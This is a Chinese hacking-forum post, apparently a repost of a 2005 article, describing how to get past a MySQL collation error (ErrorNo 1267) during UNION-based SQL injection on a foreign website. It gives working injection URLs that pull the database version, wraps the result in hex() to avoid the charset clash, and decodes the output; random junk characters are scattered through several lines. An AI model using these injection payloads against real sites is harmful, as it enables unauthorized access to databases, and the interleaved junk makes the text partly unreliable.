找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2062|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei& y/ ?- l) E" u5 O) j# m
文章性质:原创
" ^; z* E. b7 i+ T( [% }发布日期:2005-10-18
$ l+ L- T+ _$ U* q! V  m测试个国外的站时:
$ H# s5 i: C& n7 `url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
- z& k% T4 u# f. I8 S  l. C5 i返回错误:
. T! b9 H3 u5 u  l5 uIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'/ U! F3 n" F, |' I- @( n5 @
MySQL Error No. 126
% t  ]. d( H: [# \8 Z' |看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。$ w8 _7 ~8 m. d7 Y' n5 N3 x9 I. `
解决办法:转为其他编码如hex。3 z) T1 w% w, Y
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*2 C. b3 i# z* r: K) ^: Z
成功得到hex(version())的值为:
) d2 V9 n1 D* X342E312E332D626574614 M: i+ g' ?" h0 q9 Q5 [- W
回Mysql查询下得到:
3 P9 ~# l! X+ Q: _7 R6 w  {mysql> select 0x342E312E332D62657461;
8 H+ P$ H" E' g, i. \+------------------------+8 ]8 ?$ m( c4 @4 y( F& @0 B
| 0x342E312E332D62657461 |6 n2 W% c  @* M$ ]7 x! R" M
+------------------------+
0 M: T0 |0 Q0 I9 Y/ D| 4.1.3-beta |
0 r. M8 g$ a: W( }7 f( E: g8 j4 M4 o% F+------------------------+
7 ]( _7 K0 I2 C' Z1 row in set (0.00 sec)& B0 N  L# E" O8 r3 x  ?& b* E# z8 ]
+ h2 }1 [( O2 n. J) P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表